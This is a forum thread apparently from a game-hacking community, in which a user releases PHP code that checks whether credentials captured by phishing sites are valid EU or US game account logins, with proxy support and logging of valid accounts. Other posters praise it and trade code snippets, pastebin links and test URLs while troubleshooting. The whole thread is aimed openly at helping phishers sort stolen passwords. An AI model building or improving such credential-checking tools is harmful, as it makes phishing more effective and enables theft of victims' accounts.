[RELEASE] Account Check Functionality for PHP Phishers menu

User Tag List

Page 1 of 6 12345 ... LastLast
Results 1 to 15 of 76
  1. #1
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [RELEASE] Account Check Functionality for PHP Phishers

    After seeing so many phishers NOT having proper functionality, and having loads upon loads of fake accounts/passwords thrown into their logs, I decided to port over some of the functionality of Scam Tools Suite to PHP so you guys can use it in your phishers.

    You can find the latest version here.

    A newer version in the form of a class (much better PHP style) and with a bit more functionality: http://pastebin.com/f19f72b2a
    Example usage here: http://pastebin.com/f3c2bd903

    The new version has support for logging valid accounts, using proxies, and doing some extra parsing. See the commented defines at the top of the file for more details.

    To check for EU accounts use the CheckEuLogin function.
    For US accounts, use the CheckUsLogin function.

    It will fail on invalid logins, or invalid account/password combos. But return a success, when it is actually successful!

    Please note: you NEED cURL installed on your web server. The PHP script does a check to start with to make sure you have the required functions available. If in doubt, just try and check an account, and see if the "FAIL: cURL not available!" message comes up.

    It supports both EU and US log ins. And is confirmed as working!

    Enjoy folks!

    P.S: If you use it, please give credit! From what I've learned, this is the only one available with this functionality. I'm not a fan of people taking my work and slapping their names on it.
    Last edited by Apoc; 02-16-2009 at 09:19 PM.

    [RELEASE] Account Check Functionality for PHP Phishers
  2. #2
    Remus's Avatar Banned

    Reputation
    402
    Join Date
    Nov 2007
    Posts
    1,697
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    AW MAW GAWD!!!!!!!!!! ahhhhh. nice >.>

  3. #3
    wowmania's Avatar Active Member
    Reputation
    31
    Join Date
    Jun 2008
    Posts
    117
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yea great release but can you do US and Eu mixed ?

  4. #4
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Of course. Once I'm able to get into the EU account management site. I will.

    However, I prefer to keep EU/US separate. (Will be contained in the same file of course)

    This makes it easier for phishers to check based on whichever type they're targeting.

  5. #5
    wowmania's Avatar Active Member
    Reputation
    31
    Join Date
    Jun 2008
    Posts
    117
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yea this is true what the prob with the EU page ? How i can help you ?

  6. #6
    DrElitist's Avatar Member
    Reputation
    -1
    Join Date
    Dec 2008
    Posts
    35
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    cool, must test this out

  7. #7
    Freezing Process's Avatar Member
    Reputation
    1
    Join Date
    Dec 2008
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    A simple edit of the URL and it's all working. Tested and success. Fully working with the EU servers.

    Code:
    http : // pastebin.com/f323b2a6c

  8. #8
    wowmania's Avatar Active Member
    Reputation
    31
    Join Date
    Jun 2008
    Posts
    117
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thk you for the EU +Rep

  9. #9
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Freezing Process View Post
    A simple edit of the URL and it's all working. Tested and success. Fully working with the EU servers.

    Code:
    http : // pastebin.com/f323b2a6c
    Not working.

    Tested via proxy, and with actual output.

    Not to mention, the EU site requires an LT signature passed as a POST param.

  10. #10
    Freezing Process's Avatar Member
    Reputation
    1
    Join Date
    Dec 2008
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Apoc View Post
    Not working.

    Tested via proxy, and with actual output.

    Not to mention, the EU site requires an LT signature passed as a POST param.
    You sure? 'Cause it works with several of my accounts. o_O;

  11. #11
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Freezing Process View Post
    You sure? 'Cause it works with several of my accounts. o_O;
    Yup, positive.

    PHP pastebin - collaborative debugging tool

    Try that, the same way you tried the US one.

    Ex:
    Code:
    http : // yoursite/AccountCheckEngine.php?username=yourusername&password=yourpassword
    It'll just output what is returned from the cURL request. You'll see it's not quite what you're looking for.

  12. #12
    oO_Hultin_Oo's Avatar Member
    Reputation
    3
    Join Date
    Dec 2008
    Posts
    63
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    WOW. This. is. pure ****ing epic! Really good work Apoc

  13. #13
    Freezing Process's Avatar Member
    Reputation
    1
    Join Date
    Dec 2008
    Posts
    12
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Apoc View Post
    Yup, positive.

    PHP pastebin - collaborative debugging tool

    Try that, the same way you tried the US one.

    Ex:
    Code:
    http : // yoursite/AccountCheckEngine.php?username=yourusername&password=yourpassword
    It'll just output what is returned from the cURL request. You'll see it's not quite what you're looking for.
    You're doing it wrong.

    This part;
    Code:
    $tmp = CheckEuLogin($_REQUEST['username'], $_REQUEST['password']);
    
    echo $tmp;
    In the code you're posting, you're running CheckEuLogin before the function is set.

    Check out how I added the checking part;

    http : // sophonax.com/phis.phps

    Run the code here;

    http : // sophonax.com/phis.php?username=yourusername&password=yourpassword

    Works fine with me.
    Last edited by Freezing Process; 12-31-2008 at 11:08 AM.

  14. #14
    Pina's Avatar Active Member
    Reputation
    45
    Join Date
    Dec 2007
    Posts
    184
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Freezing Process View Post
    You're doing it wrong.

    This part;
    Code:
    $tmp = CheckEuLogin($_REQUEST['username'], $_REQUEST['password']);
    
    echo $tmp;
    In the code you're posting, you're running CheckEuLogin before the function is set.

    Check out how I added the checking part;

    http : // sophonax.com/phis.phps

    Run the code here;

    http : // sophonax.com/phis.php?username=yourusername&password=yourpassword

    Works fine with me.

    It says ACCEPTED to me.
    Last edited by Pina; 12-31-2008 at 11:18 AM.

  15. #15
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Freezing Process View Post
    You're doing it wrong.

    This part;
    Code:
    $tmp = CheckEuLogin($_REQUEST['username'], $_REQUEST['password']);
    
    echo $tmp;
    In the code you're posting, you're running CheckEuLogin before the function is set.

    Check out how I added the checking part;

    http : // sophonax.com/phis.phps

    Run the code here;

    http : // sophonax.com/phis.php?username=yourusername&password=yourpassword

    Works fine with me.
    The great part about PHP, the function doesn't need to be defined first if it's in the same file.

    I.E: Do the same, but add an echo "In a function<br />"; in the CheckUsername, CheckPassword, and CheckAccount functions. You'll see there's no problem calling them.

    Also, you still didn't do what I told you to.

    Change
    Code:
        if (strstr($returnedPage, "Invalid account name or password"))
        {
            return "FAIL: Invalid account name or password";
        }
        else
        {
            return "SUCCESS";
        }
    To
    Code:
        if (strstr($returnedPage, "Invalid account name or password"))
        {
            return "FAIL: Invalid account name or password";
        }
        else
        {
            return $returnedPage;
        }
    You'll see your output is NOT what you think it is. (Keep in mind, it's only checking if the page contains "Invalid account name or password".)

Page 1 of 6 12345 ... LastLast

Similar Threads

  1. [Release] Scan Pixels function for VB.net
    By suicidity in forum World of Warcraft Bots and Programs
    Replies: 6
    Last Post: 07-09-2014, 02:12 PM
  2. New Account Check Function
    By jasejunk in forum WoW Scams Help
    Replies: 3
    Last Post: 06-24-2009, 12:54 PM
  3. [Epic] Newest Phisher with Account Checking Function!
    By faculty1 in forum WoW Scam Prevention
    Replies: 8
    Last Post: 06-05-2009, 11:09 AM
  4. Replies: 33
    Last Post: 04-26-2009, 08:54 PM
  5. [Release] Account Registration Form For mangos
    By Anthonyrox8 in forum WoW EMU General Releases
    Replies: 8
    Last Post: 09-20-2008, 05:40 PM
All times are GMT -5. The time now is 01:54 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search